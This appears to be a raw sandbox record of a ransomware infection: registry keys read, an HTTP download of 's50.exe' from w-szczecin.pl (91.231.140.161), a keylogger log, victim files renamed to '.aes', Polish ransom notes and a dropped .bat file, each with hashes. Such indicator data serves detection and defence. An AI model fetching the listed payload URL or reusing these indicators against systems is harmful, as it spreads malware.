HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\ODiag HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OSession HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\ODiag HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OSession HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\ODiag HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OSession HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\ODiag HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OSession HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB SocketAddress 91.231.140.161 80 TCP NetworkSocket 91.231.140.161 80 TCP Contains SocketAddress w-szczecin.pl 80 NetworkConnection HTTP w-szczecin.pl 80 URI w-szczecin.pl/img2/s50.exe Contains URI None File conout$ File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase File programdata\keyboard\17102017_012722.log programdata\keyboard\17102017_012722.log c:\ c:\programdata\keyboard\17102017_012722.log log MD5 a1fb0cacc1cee630641b508b2086b7a9 SHA1 064cf6477e359f9084098da05bc974b1147f16f4 SHA256 6426309787950c45434ce8d35229ff32437868cc6c437c397625061cb788ec81 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\1bus.odt.aes aes MD5 f2cab558712cd7186fcf61d6f3787620 SHA1 40a933423897a3f92306a5881ac01c9181ca9afd SHA256 a3c45f43e438c138ca658fbb4e05734d8c15acce65427bec9135f091c2730593 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\#$# jak-odzyskac-pliki.txt txt MD5 cbe0aa03a088135610ec0779aba641c5 SHA1 9b36102fabaf1599b4f6f5f52c2645e3194aba67 SHA256 10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\nvo-4p-kzz-c6do0e\b-s_mvdiahrja wonyd7.csv.aes aes MD5 dbcb43a9798c0304870a937e10d2b081 SHA1 f1a7ef9a881ffa6185da630da6e884b11bbb5260 SHA256 9f939c63edf1a9169fd470cda68210ed428d86ca83cb9037c322f93c3c53929c File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\3frpiupvjo9pxh.doc.aes aes MD5 da8d033bbbe5b451eac7b4ac77ee0d16 SHA1 34e0c518033bb64058b612e7ceeb20578d5ca2cd SHA256 b6182e025ca557bb2c1538d2d498ff163ec0bbca095149619f716358627077b8 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\#$# jak-odzyskac-pliki.txt txt MD5 cbe0aa03a088135610ec0779aba641c5 SHA1 9b36102fabaf1599b4f6f5f52c2645e3194aba67 SHA256 10b7fb47b1daca2e850685089a4099b1e3e6b95e57d062434dff57a0ac2727a6 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\7wldze9wqqhkod.odp.aes aes MD5 4420d02ae796332100cb6fb22d53981e SHA1 cc3baed9e423ca7029a69b5e05e7343f6b0fc22e SHA256 8bab0ee1a1e2d309eaf3bf055575b00828bb0f5ebab96a0ac6ae61f7c82ef4b4 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\hvcemxs1islck.doc.aes aes MD5 2097ab114a5b50c789d3d41038337434 SHA1 1c42f8ae3849e66b3ac412a8dc101c63ed2459ba SHA256 c18f2f582daa67496f9d55aacf60e3edb9dc74eadb1f3875af33ced36447f206 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\pa730znol5.rtf.aes aes MD5 58bf0255677de942755ea7b7dbcfaf10 SHA1 f60e537f2659ce20ce8b8f86092ffce3ba47bba6 SHA256 413416e46b46964f5d0fb72b330ffc5d7ac3c49bcfa6826cc9d04e70137aab25 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\hkrkjnzp\_x864g9nghehtp16yw.ods.aes aes MD5 46f2018c9afedc0f7cd8ceddb2e00e95 SHA1 88ebb09b8b4b916f0bd5118e7ffb84b04880953f SHA256 2a99f7ac23b8090ab9004e5268c8381c66e4c13b8c6222260b645bb862a8e360 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\0qp cbtp2kdutxphn8y.csv.aes aes MD5 1dd5743b7642ab3f7ebf23a2c4d11bed SHA1 0fa780b46783b4d6d02c2fcdcc76e380964a8072 SHA256 48ed4ee93ac7712258e9692ffe388ffde95f41234bfbcf39de333d1478ce63fb File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\#$# jak-odzyskac-pliki.txt txt MD5 0b5f0f80cc4b36b483bb621bb425c777 SHA1 933d96b6b6f3953641eb927871482d46a68587b1 SHA256 e4841e111ff327774b47d7a880fc5ef644885929615b1a9b3ac325cf2ddcf0a4 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\f6p3h-e5k60slj.pdf.aes aes MD5 f8023e58ab11fa5ef5e9f6a263d672a3 SHA1 a886ac508b0e21b56829e27c1a68504a3bc25cf5 SHA256 c32e2e5fae3a1ba9c7ac5afb2e44ee719a2a7d79a06a25206ce41997d3693e1c File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\iufdafezbb3p- l4i3e.rtf.aes aes MD5 28ebc3a1b1fe94cc03f43f3cdd76b961 SHA1 40915812c97a291642b009625b59bddb3c09530d SHA256 71425428390900f936b53991578c19e2161a143028209a919e297476d51db896 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\pwqhqsjinpvfkbjkrzb.rtf.aes aes MD5 663b3cb0a0ffde4211d6099d1d744572 SHA1 6cdfff84c93a0cde5805a2fe81a4f27d223daba0 SHA256 97ec7a84cbf36bc41d4a6ec973f3f76c725b5129ab814c7d93c56647b3f8739b File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p9grc6n9ugq9v\t8rijba3r5ril.pptx.aes aes MD5 ab4d82455547a815c43ed9c055badce6 SHA1 8bb40d5459ee9726d3728cd4c76fa35e800f5c5e SHA256 8b3bcab35f8e11efb3807baa8785328322c03f0145f863422525df5e87ba0c76 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\0_b3ijrl61ikm2.xls.aes aes MD5 8e4cc4c2b7762bb926abbb3007736831 SHA1 d6d246bc12fcb5e67e121caf52d07feb6cce47ec SHA256 8228409efa8aa583936fd32c6b3137ca5e4677c4c2c0cfaadd5a8e21cc54a2f3 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\#$# jak-odzyskac-pliki.txt txt MD5 b862b4250082ea6c4db185c4068292b4 SHA1 3637ded2b5a9eb6beb9cf479ffe1324a240c8880 SHA256 a81c24f504e998f5a0003223d74aeb74f0a4ecf81f06e979a4b468bc2c847bfc File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\568wxqkdq_fimwon.pdf.aes aes MD5 247b667d9fb0fc8b2eeb7f6b8dd15360 SHA1 86aea694a1065a8a261b8b878c25bedd8c5d5cdf SHA256 c6a0aca2c5b19931f50fa52b0e3f24f854d7d5516ceac0983bb169d1de30d9bd File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\8m1fcp.ots.aes aes MD5 c3fa5deca0032d11062c098aca043806 SHA1 f29cdcc56481817d3507edbc5a67c188074d467d SHA256 180f9e94819f02c6b8ff6e3d093973c16cc869c8e0871a429e312a85c235aed5 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\p2qhvhrc07x 6m.odt.aes aes MD5 1c97627a6dbb86fd651e5a2ecdd1c439 SHA1 7b682fcff36969b9c76b2b879668c588dca05da9 SHA256 7dd3b123673fe046879e00ef60e78482ee4b53411830fe23ee03dce07644d068 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\urm66b8mfk_b.docx.aes aes MD5 d9ea2dd5cc2040cebb83b1202a21bcc8 SHA1 d523dea27e8e78cfc129ad6e4c79f03681956d05 SHA256 b805ff00bed7062529f73f3bd639421542860dbadfcd7fd470743ffa0054f1f7 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\vfwuhdcvzf0grto.pptx.aes aes MD5 e703703b34b46197760b09e17cf8df6a SHA1 78f113ba271b320ebb256029640d38633fdfa053 SHA256 179ef98c877640d95d681751c615cfd7cc26cb6735ad9dabbe158c20ffc95082 File users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls.aes users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\oxq6tndno0\wvf jpe1b.xls.aes aes MD5 760f9fb0025e83f024a3cf667642a529 SHA1 4b9e921ca48b9204bd2f0d15a22b77492363d379 SHA256 c7946be6a97b1d1b8136be5226cbd00c1d01543afb780a5341d07fc9eb89d5d9 File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf.aes users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\n1mkd81vkeia7s2.rtf.aes aes MD5 8a8c0f566668e1b12b7fc374828700ec SHA1 36a31257d40b8f92f2f6cb1c3baabf73c0f2f3fe SHA256 e6b2fd1d505f8752f242990ec1d3d79eae59bd57fef2b63aada93d2c531254de File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\#$# jak-odzyskac-pliki.txt txt MD5 f9ae75622ad7932bde701dd30af9ab14 SHA1 27afb65304d50a280fe85b6b8986766c6adf77f2 SHA256 866ea96120ab6a005968d8c52e61bec38d7bd6d57c5c88ce4ea616167c2322b7 File users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat c:\ c:\users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat bat MD5 2cf00a0b576815e19471a6cfe7a0d898 SHA1 dee9eab29048d71fc2c04bf18edb260bf12fb84e SHA256 1aaedbc63631dcece73558d47f1f587bf001ffd0d2bcfabd53fd220145238cbd File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc.aes users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\orrmspmnhogtvab.doc.aes aes MD5 861e60657aebfcc7642f866b5a0a750a SHA1 b75956081f84bff389f8fa4f973f4a347244584b SHA256 2f5acaae23f5533756bebe73f7bbadbc5246b0ffe98e1116ef305d0e69e622bb File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx.aes users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\pp5 bxjs.pptx.aes aes MD5 86c2590421d0d348a200f05dc4e7c4ad SHA1 23604d488a32495bb3421425f4e7cfa19fba158b SHA256 d7834715834fdb5e81ac4cb8101fcc07dca7426c95f47c8fd084518da41f816e File users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps.aes users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\qa6qfkq\xlyls6yx0mico1.pps.aes aes MD5 2a7bfc3cf0f4fbe0577883b7d30b24d1 SHA1 279fa16faa121754dd7c8b8473384753fa6678cc SHA256 0ee488c057b7eb0dea6fd92d10c54e4af2702a575372f8ce9c037cb3465c9dd4 File users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt.aes users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\-gjqedw.odt.aes aes MD5 456eed0508e2413c39b2b8d84675eaca SHA1 5096048a6c050f8a854d340602ede89a93ed4a99 SHA256 4da6555871ca52baf7e32a27f507ed24c51ee682c510f203f5f2c25ed1d95654 File users\kft6utqw\documents\6_uymfikkpct\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\6_uymfikkpct\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\6_uymfikkpct\#$# jak-odzyskac-pliki.txt txt MD5 8886e301646afb67cb7813dc0f7e02cf SHA1 d88cd92273a6ebdcb2f15397f26538225f72b569 SHA256 088385cb2c06a411ad885942c2622cfe1a5019eb813d8c864c6e9f207dd8996e File users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods.aes users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\8puhjof5oub0zf3kj4pk.ods.aes aes MD5 f736d4fe414d5a96da5d318e17003b7a SHA1 8f540830fa6292849ed7e1e7467a9913dae51d65 SHA256 23a952ff47965e370d1e0734bb24e961d17f388a0bcb699812214ad374293809 File users\kft6utqw\documents\6_uymfikkpct\eqov.odp.aes users\kft6utqw\documents\6_uymfikkpct\eqov.odp.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\eqov.odp.aes aes MD5 629c3efd21e819bf8403e7bac426ff43 SHA1 6ed8a239d5e5c66f7b902c5c150a485deca35888 SHA256 45b0b2e857db63bebfa3b32e019df246fce7be46831e8915db236db3f03ef7ab File users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt.aes users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\szjbmk.odt.aes aes MD5 7d6189a5e358a3db01df0b2bc9d0266a SHA1 355c5027b132c1362a9e432006d1908838ac5ff4 SHA256 1e60d21becf6a5139ee2f4954254cf9628791fa1113fd2cf8fd4ca92aea49232 File users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx.aes users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\twiwowooujkw1 zw.xlsx.aes aes MD5 153ee5db297301ffd96983788dccea06 SHA1 af48185220f49d199f1cd2dd0e185700d2c05629 SHA256 32897f53047e553dc85126c580bbe2e66af2fc00e85086aa5328d2c997c85e0c File users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc.aes users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc.aes c:\ c:\users\kft6utqw\documents\6_uymfikkpct\x4gpvtjmanpijoufg-lc.doc.aes aes MD5 26f64e8f52b26de04290c2d83e4fb7c9 SHA1 affc2244157cb2ce3c91cf94b1b7386d44e08882 SHA256 23dddcc330308bdf3e54772f032afb7543cd69a2b44f12be89a8d9d8958ba1c6 File users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf.aes users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf.aes aes MD5 eb4ad3a71fef07c5a245e222165f1a97 SHA1 76b9971d5a40c71c7560e6cca39b44ad3ba52bc4 SHA256 2a458896b551c6fd2d2a581d5b99f1e2899ae369d27222d6161ec53ee6584f7c File users\kft6utqw\documents\lq5_4qumspxkagf3\#$# jak-odzyskac-pliki.txt users\kft6utqw\documents\lq5_4qumspxkagf3\#$# jak-odzyskac-pliki.txt c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\#$# jak-odzyskac-pliki.txt txt MD5 d28ffc0599c0bf506262aaa0165f04e8 SHA1 793b0f06ae3ae91e2e9e35304e3ea4915fa5e036 SHA256 0488eb29731384d0809a3b6ea398bf3696425c759803a0cf3cb07a750a8f1df9 File users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv.aes users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv.aes aes MD5 d9f2d8ef5888f99a555ba812248ab13f SHA1 c1b405cbf7a26852d3309ffcccdc9145cfe217ca SHA256 49a36342151e20aefbf760e22585680bb975b7b79bfad8e1894d735a116e9c7f File users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf.aes users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf.aes c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf.aes aes MD5 b2e7008bea1bf130a8fe4100c506c7cb SHA1 5c6391712575d5591befc65932fe87ef58475a2f SHA256 5fae1cfde692ab6411ac4548c2c1567b2717e5fe3498533751337d34861c4af4 File 